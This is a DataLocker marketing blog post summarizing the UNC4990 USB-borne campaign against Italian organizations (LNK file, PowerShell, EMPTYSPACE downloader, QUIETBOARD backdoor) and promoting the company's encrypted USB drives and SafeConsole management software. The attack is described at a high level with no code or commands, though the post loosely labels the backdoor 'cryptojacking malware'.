Organizations globally, with Italy being no exception, are facing a surge in cyber threats. Most USB cyberattacks possess the capability to disrupt operational technology. These attacks, orchestrated by financially motivated threat actors, deploy weaponized USB devices to disseminate cryptojacking malware.
Weaponized USB attacks represent a particularly insidious form of cyber threat, as they leverage physical devices that are commonly used and easily overlooked. Once inserted into a system, these malicious USB devices can quickly infect computers and networks, often without the user’s knowledge or consent. The payload of such attacks typically includes cryptojacking malware, which covertly hijacks the victim’s computing resources to mine cryptocurrencies for the benefit of the attackers.
This article delves into the intricacies of these assaults, shedding light on the workings of cryptojacking malware, and the critical need for proactive measures to safeguard against such attacks.
Details of the Attack
UNC4990, a financially motivated threat actor, employs weaponized USB devices as the primary method to infiltrate organizations across various sectors in Italy. Let us explore the attack in detail.
USB Infection
The attack begins with the widespread distribution of infected USB devices. These devices contain malicious files intended to exploit vulnerabilities in the target systems.
Deployment of EMPTYSPACE Downloader
Upon connecting the infected USB device, victims inadvertently trigger the execution of a malicious LNK shortcut file. This action initiates a PowerShell script that downloads and decodes the EMPTYSPACE downloader.
Downloader Execution
The EMPTYSPACE downloader, once activated, proceeds to fetch additional payloads from third-party websites such as GitHub, Vimeo, and Ars Technica. These payloads are crucial for the subsequent stages of the attack.
Payload Retrieval
The downloader serves as a conduit for retrieving next-stage payloads from a command-and-control (C2) server. One of the primary payloads deployed is a backdoor known as QUIETBOARD.
QUIETBOARD Backdoor
Upon successful deployment, the QUIETBOARD backdoor establishes unauthorized access to the victim’s system. This backdoor enables threat actors to execute commands, exfiltrate data, or deploy further malware.
Utilization of Popular Sites
The malware utilizes legitimate and widely used websites for hosting malicious payloads. This tactic poses a significant challenge for detection and mitigation efforts, as the malicious activities may go unnoticed within the vast volume of legitimate traffic.
Understanding Cryptojacking Malware
Cryptojacking malware, such as QUIETBOARD, is designed to covertly hijack computing resources to mine cryptocurrencies without the user’s consent. In addition to mining cryptocurrencies, QUIETBOARD is equipped with various features, including executing arbitrary commands, altering crypto wallet addresses, propagating the malware to removable drives, taking screenshots, and gathering system information.
Execution of Arbitrary Commands
Some variants of cryptojacking malware, including QUIETBOARD, possess the capability to execute arbitrary commands on the infected system. This functionality allows threat actors to remotely control the compromised devices for various malicious purposes.
Wallet Address Alteration
Cryptojacking malware may also tamper with cryptocurrency wallet addresses stored on the victim’s system. By replacing legitimate wallet addresses with those controlled by the attackers, they can redirect mined cryptocurrency to their own wallets, depriving the legitimate owners of their earnings.
Propagation via Removable Drives
Certain cryptojacking malware strains, like QUIETBOARD, have the ability to spread to other devices through removable drives. When a removable drive infected with the malware is connected to another system, it may automatically execute and propagate the infection, expanding the malware’s reach.
Screenshot Capture
A few cryptojacking malware incorporate functionality to capture screenshots of the attacked system. This feature enables attackers to gather sensitive information, such as login credentials or financial data, for further exploitation.
System Information Gathering
Cryptojacking malware often includes mechanisms to collect detailed information about the compromised system. This data may include hardware specifications, operating system details, network configurations, and installed software. Gathering such information helps attackers assess the system’s capabilities and potential vulnerabilities for exploitation.
Proactive Prevention Measures
To combat such sophisticated threats, organizations need to adopt a proactive approach to cybersecurity. Encrypted hardware and software solutions, such as those offered by DataLocker, play a crucial role in preventing USB-based attacks. By employing FIPS 140-2 compliant encryption and device management capabilities, DataLocker ensures that USB devices remain secure and protected against malicious activities.
Encrypted Hardware Solutions
DataLocker provides a range of encrypted hardware solutions designed to safeguard sensitive data stored on USB devices. They are FIPS 140-2 compliant, meeting the rigorous security requirements mandated by government and industry regulations. By encrypting data at rest, DataLocker’s hardware solutions mitigate the risk of unauthorized access and data breaches, even if the device falls into the wrong hands.
Centralized Device Management
DataLocker’s SafeConsole software offers centralized device management, empowering organizations to implement granular security policies, enforce data encryption standards, and track device usage across the entire organization. Through the centralized management interface, administrators can remotely wipe lost or stolen devices, revoke access privileges, and ensure compliance with data protection regulations.
Check out our product demo to see the efficiency of DataLocker products and solutions.
Safeguarding Businesses Against Evolving Threats with DataLocker
The recent surge in USB-based attacks targeting Italian businesses underscores the evolving nature of cyber threats. As threat actors continue to employ sophisticated tactics, it is imperative for organizations to remain vigilant and adopt robust cybersecurity measures. By leveraging encrypted USB devices and implementing proactive security strategies, businesses can effectively mitigate the risks posed by cryptojacking malware and other cyber threats.
DataLocker offers a comprehensive solution with its encrypted USB devices and centralized USB device management platform. By implementing DataLocker’s encrypted solutions, organizations can effectively mitigate the risks posed by cryptojacking malware and other cyber threats. Wait no more! Reach out to us to protect your business against potential threats.